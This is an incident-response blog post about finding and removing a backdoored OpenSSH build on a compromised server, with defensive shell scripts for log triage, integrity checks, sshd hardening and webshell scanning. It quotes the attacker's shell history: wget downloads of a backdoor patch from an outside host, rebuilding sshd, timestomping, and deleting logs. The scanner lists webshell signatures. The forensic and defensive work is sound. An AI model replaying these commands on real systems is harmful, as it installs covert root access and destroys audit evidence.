Backdoor implantation: experience and solutions
Over the past few days I found that many programs on the server had been infected with trojans, and cleaned up the trojan files together with the developers. This morning the game back end could not be opened again. On the server I found that all the entry files of the back-end program had been deleted; after restoring index.php and admin.php it could be accessed normally. Nobody had logged on to the server during the night, so the server had clearly been intruded, and I started to troubleshoot:
1. First look at the security log:
more /var/log/secure | grep Accepted
In the command output the following records were suspicious:
Jul 28 05:32:17 localhost sshd[21684]: Accepted password for root from 103.231.104.70 port 3551 ssh2
Jul 28 05:37:52 localhost sshd[22754]: Accepted password for root from 103.231.104.70 port 3602 ssh2
Jul 28 05:44:40 localhost sshd[23396]: Accepted password for root from 103.231.104.70 port 3650 ssh2
These records show that at 05:32, 05:37 and 05:44 the root account logged on successfully with a password from 103.231.104.70. That address is registered in the Hong Kong Special Administrative Region and is presumably a proxy or jump host rather than the attacker's own machine.
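Step 1 can be run over the whole log instead of eyeballing the grep output. The shell functions below are an added example, not from the original post; the log excerpt they run on is constructed in the same format as the lines above (the 10.0.0.5 deploy login and the failed attempt are invented for contrast), and the allowlist address passed to unknown_sources is an assumption.

```shell
#!/bin/bash
# Added example, not part of the original post: triage successful sshd logins
# in /var/log/secure. SAMPLE_LOG is constructed in the format quoted above;
# on a real box feed the functions the log itself, e.g.
#   accepted_summary < /var/log/secure
SAMPLE_LOG='Jul 28 01:12:03 localhost sshd[20011]: Accepted publickey for deploy from 10.0.0.5 port 51022 ssh2
Jul 28 05:32:17 localhost sshd[21684]: Accepted password for root from 103.231.104.70 port 3551 ssh2
Jul 28 05:35:01 localhost sshd[22100]: Failed password for root from 103.231.104.70 port 3590 ssh2
Jul 28 05:37:52 localhost sshd[22754]: Accepted password for root from 103.231.104.70 port 3602 ssh2
Jul 28 05:44:40 localhost sshd[23396]: Accepted password for root from 103.231.104.70 port 3650 ssh2'

# Fields of an "Accepted" line: $6=Accepted $7=auth method $9=user $11=source IP

# One line per (user, method, source IP) with its login count, busiest first.
accepted_summary() {
    awk '/sshd\[[0-9]+\]: Accepted/ {print $9, $7, $11}' \
        | sort | uniq -c | sort -rn \
        | awk '{print $1, $2, $3, $4}'
}

# Timestamp and source of every password login as root. On a box where root
# should only come in with a key (or not at all), every line here is a finding.
root_password_logins() {
    awk '/sshd\[[0-9]+\]: Accepted password for root from/ {print $1, $2, $3, $11}'
}

# Source IPs with at least one successful login that are not in the
# space-separated allowlist $1 (office, VPN, bastion addresses).
unknown_sources() {
    awk -v known=" $1 " \
        '/sshd\[[0-9]+\]: Accepted/ && index(known, " " $11 " ") == 0 {print $11}' \
        | sort -u
}

printf '%s\n' "$SAMPLE_LOG" | accepted_summary
printf '%s\n' "$SAMPLE_LOG" | root_password_logins
printf '%s\n' "$SAMPLE_LOG" | unknown_sources "10.0.0.5"
```

On the sample the summary puts the three root password logins from 103.231.104.70 first, and 103.231.104.70 is the only source not in the allowlist. Run the same functions over the rotated copies (secure-YYYYMMDD) as well, since an attacker who deletes logs, as this one did with wtmp, rarely gets all of them.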
2. Next I checked the system log (messages) and the wtmp log. Nothing was found there; the shell history below shows why, since the attacker deleted wtmp and other logs.
3. Then I checked the shell history and found the problem:
387  cp -p /etc/ssh/sshd_config{,.bak}
388  wget www.k2a.cn/Tools/open.tar.gz
406  cd /etc/ssh/
407  ls
408  wget www.k2a.cn/Tools/patch.tar.gz
409  ls
410  tar -zxvf open.tar.gz
411  tar -zxvf patch.tar.gz
412  cd openssh-5.9p1.patch/
413  cp sshbd5.9p1.diff ../openssh-5.9p1
414  cd ../openssh-5.9p1
415  patch diff
416  vim includes.h
417  ssh -V
418  vim includes.h
419  vi version.h
420  ssh -V
421  vi version.h
422  ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
423  make
424  make install
425  id
426  touch -r sshd_config.bak ssh_config
427  cd ..
428  touch -r sshd_config.bak ssh_config
429  service sshd reload
430  ls
431  rm -rf *.tar.gz
432  rm -rf open*
433  rm -rf *.bak
437  cd /var/log/
439  rm -rf wtmp
440  rm -rf *log
442  cd /etc/scl/prefixes/
448  rm -rf *
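Two of the techniques in this history leave traces on disk that can be tested for directly: the lock attributes that lsattr turns up later in this post (they are what makes "rm /usr/bin/ssh" fail with Operation not permitted), and the timestomping with touch -r, which copies an old mtime onto a freshly built file but cannot stop the kernel from updating ctime. The script below is an added example, not from the original post or from any tool mentioned in it; it assumes an RPM-based system with GNU stat and date and lsattr from e2fsprogs, and the sample lsattr strings in the comments are constructed.

```shell
#!/bin/bash
# Added example, not part of the original post: check the files OpenSSH
# installs for the traces this intrusion left behind. Assumptions: an
# RPM-based system (rpm, GNU stat/date, lsattr from e2fsprogs).
#   * lock attributes set with chattr, which the post later finds with
#     lsattr and which make "rm /usr/bin/ssh" fail with Operation not permitted
#   * timestomping with "touch -r": it copies mtime from a reference file
#     but the kernel still bumps ctime, so a ctime long after the package's
#     install time means the inode was rewritten, chmod'ed or chattr'ed later

# Return 0 if an lsattr flag string contains immutable (i) or append-only (a).
# lsattr prints the flags as the first field, e.g. (constructed)
# "-u-S-ia---------e--- /usr/bin/ssh".
has_lock_attrs() {
    local flags="${1%% *}"
    case "$flags" in
        *i*|*a*) return 0 ;;
        *)       return 1 ;;
    esac
}

# Return 0 when ctime is more than $3 seconds (default 300) after installtime.
changed_after_install() {
    local ctime="$1" installtime="$2" slack="${3:-300}"
    [ $((ctime - installtime)) -gt "$slack" ]
}

# Run the checks on one path and print a line per finding.
audit_file() {
    local f="$1" attrs ct inst
    [ -e "$f" ] || { echo "$f: missing"; return 1; }
    if attrs=$(lsattr -d "$f" 2>/dev/null) && has_lock_attrs "$attrs"; then
        echo "$f: lock attributes set: $attrs"
    fi
    if command -v rpm >/dev/null 2>&1; then
        ct=$(stat -c '%Z' "$f")
        inst=$(rpm -qf --qf '%{INSTALLTIME}\n' "$f" 2>/dev/null | head -n 1)
        case "$inst" in
            ''|*[!0-9]*) echo "$f: not owned by any package" ;;
            *) if changed_after_install "$ct" "$inst"; then
                   echo "$f: inode changed $(date -d "@$ct"), package installed $(date -d "@$inst")"
               fi ;;
        esac
        # S/5/T = size, hash or mtime differ from the package database. Two
        # caveats: prelink rewrites binaries (rpm -V allows for it, the ctime
        # test above does not), and root can edit the rpm database itself.
        rpm -Vf "$f" || true
    fi
    return 0
}

# Usage: audit_ssh.sh /usr/bin/ssh /usr/sbin/sshd /etc/ssh/ssh_config
for f in "$@"; do
    audit_file "$f"
done
```

A clean result from rpm -V is necessary, not sufficient: the attacker here had root, and a root attacker can rewrite the rpm database as easily as the binary. Comparing hashes against a known-good copy of the same package version from the distribution mirror is the stronger check.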
The history shows what happened: the attacker fetched the OpenSSH 5.9p1 source together with a backdoor patch (sshbd5.9p1.diff), applied it, edited includes.h and version.h while checking ssh -V in between so that the rebuilt binaries would still report the original version, built and installed them over the system OpenSSH (--prefix=/usr/ --sysconfdir=/etc/ssh/), copied the old config's timestamps onto the new files with touch -r, reloaded sshd, and finally deleted the archives, the .bak copy, wtmp and other logs. I have also found several articles about this kind of ssh backdoor; if you are interested, refer to them:
Http://www.bkjia.com/Article/201309/242910.html
As the article explains, the attacker rewrites the version string and uses ssh -V to confirm that the binary still reports the previous version. The version check therefore only catches careless backdoors: a binary that reports the expected version is not thereby clean. The emergency measures taken were:
Reinstall OpenSSH from a clean source or package, updated to the latest version.
Change the default ssh port.
Add an ssh access policy to iptables.
During the reinstall, make && make install failed with the following error:
Cannot remove '/usr/bin/ssh': Operation not permitted
lsattr showed the u, S, i and a attributes set on ssh; i (immutable) and a (append-only) are what block the removal. Clear them with chattr -uSia on every file the error names, then reinstall.
After installation, check with ssh -V that the reported version is the one just built.
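The three measures put into practice, as an added example that is not from the original post: a shell function that rewrites sshd_config idempotently, a constructed sample configuration to exercise it, and a function for the iptables access policy. Beyond the post's list it also sets PermitRootLogin no and PasswordAuthentication no, since this incident began with a root password login from an unknown address. Port 2222, the 10.0.0.0/24 admin network and the RHEL/CentOS-style paths and init scripts are assumptions.

```shell
#!/bin/bash
# Added example, not part of the original post: the three emergency measures
# as code. Assumptions: RHEL/CentOS-style paths and init scripts, port 2222,
# admin network 10.0.0.0/24. Only useful once the backdoored sshd binary has
# been replaced: a trojaned sshd does not have to honour its config file.

# Rewrite an sshd_config (stdin -> stdout) so each "Key value" pair given as
# arguments appears exactly once before any Match block: active and
# commented-out lines for the key are replaced, duplicates dropped, missing
# keys appended. Lines inside Match blocks are left untouched.
set_sshd_options() {
    awk -v opts="$*" '
    BEGIN {
        n = split(opts, p, /[ \t]+/)
        for (i = 1; i < n; i += 2) want[p[i]] = p[i + 1]
    }
    {
        raw = $0
        sub(/^[ \t]*#?[ \t]*/, "", raw)          # the line without "#" and indent
        split(raw, f, /[ \t]+/)
        key = f[1]
        if (!inmatch && $0 ~ /^[ \t]*Match([ \t]|$)/) {
            # anything appended after a Match block would apply only inside
            # it, so emit the keys not seen yet right before the first Match
            for (k in want) if (!(k in done)) { print k " " want[k]; done[k] = 1 }
            inmatch = 1
        }
        if (!inmatch && (key in want)) {
            if (!(key in done)) { print key " " want[key]; done[key] = 1 }
            next
        }
        print
    }
    END { for (k in want) if (!(k in done)) print k " " want[k] }'
}

# Access policy for the new port: admin network only, everything else dropped.
# Not run below; needs root.
ssh_firewall() {
    local port="$1" admin_net="$2"
    iptables -I INPUT -p tcp --dport "$port" -s "$admin_net" -j ACCEPT
    iptables -A INPUT -p tcp --dport "$port" -j DROP
    service iptables save
}

# Constructed sample config for the demo; the real file is /etc/ssh/sshd_config.
SAMPLE_CONF='#Port 22
PermitRootLogin yes
X11Forwarding yes
Match User backup
    PasswordAuthentication yes'

printf '%s\n' "$SAMPLE_CONF" | set_sshd_options Port 2222 PermitRootLogin no PasswordAuthentication no
```

On the real box: run set_sshd_options Port 2222 PermitRootLogin no PasswordAuthentication no with /etc/ssh/sshd_config on stdin and a new file on stdout, validate the result with sshd -t -f on that file, on an SELinux-enforcing host register the port first with semanage port -a -t ssh_port_t -p tcp 2222, then move the file into place and restart sshd while the current session stays open and a second login on the new port has been confirmed. Apply ssh_firewall 2222 10.0.0.0/24 last, from the admin network.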
The development colleagues also helped look for the trojan in the code, using the following script:
#!/bin/bash
# Scan every site under /home/web for common webshell signatures and for PHP
# files modified in the last 24 hours; findings go to /opt/safelog.
webroot="/home/web"
logdir="/opt/safelog"
[ -d "$logdir" ] || mkdir -p "$logdir"

# Known shell names plus eval/assert fed from compressed, base64-encoded or
# POSTed input. (The widely copied original had "gunerpress" and
# "base64_decoolcode", which match nothing; corrected here.)
pattern='phpspy|c99sh|milw0rm|eval\(gzuncompress|eval\(base64_decode|spider_bc|eval\(\$_POST\[|assert\(\$_POST\['

function checksafe(){
    path="$webroot/$1"
    cd "$path" || return
    # -H prints the file name even when xargs hands egrep a single file;
    # the matching line itself is logged, not just the name.
    re=$(find . -type f -name '*.php' -print0 | xargs -0 egrep -H "$pattern")
    if [ -n "$re" ]; then
        echo "$re" > "$logdir/$1_$(date +%Y%m%d).txt"
    fi
    modifytime "$1"
}

function modifytime(){
    # A PHP file changed in the last day on a site nobody deployed to is worth a look.
    re=$(find . -mtime -1 -type f -name '*.php')
    if [ -n "$re" ]; then
        echo "$re" > "$logdir/$1_mf_$(date +%Y%m%d).txt"
    fi
}

for i in $(cd "$webroot" && ls); do
    echo "$i"
    checksafe "$i"
done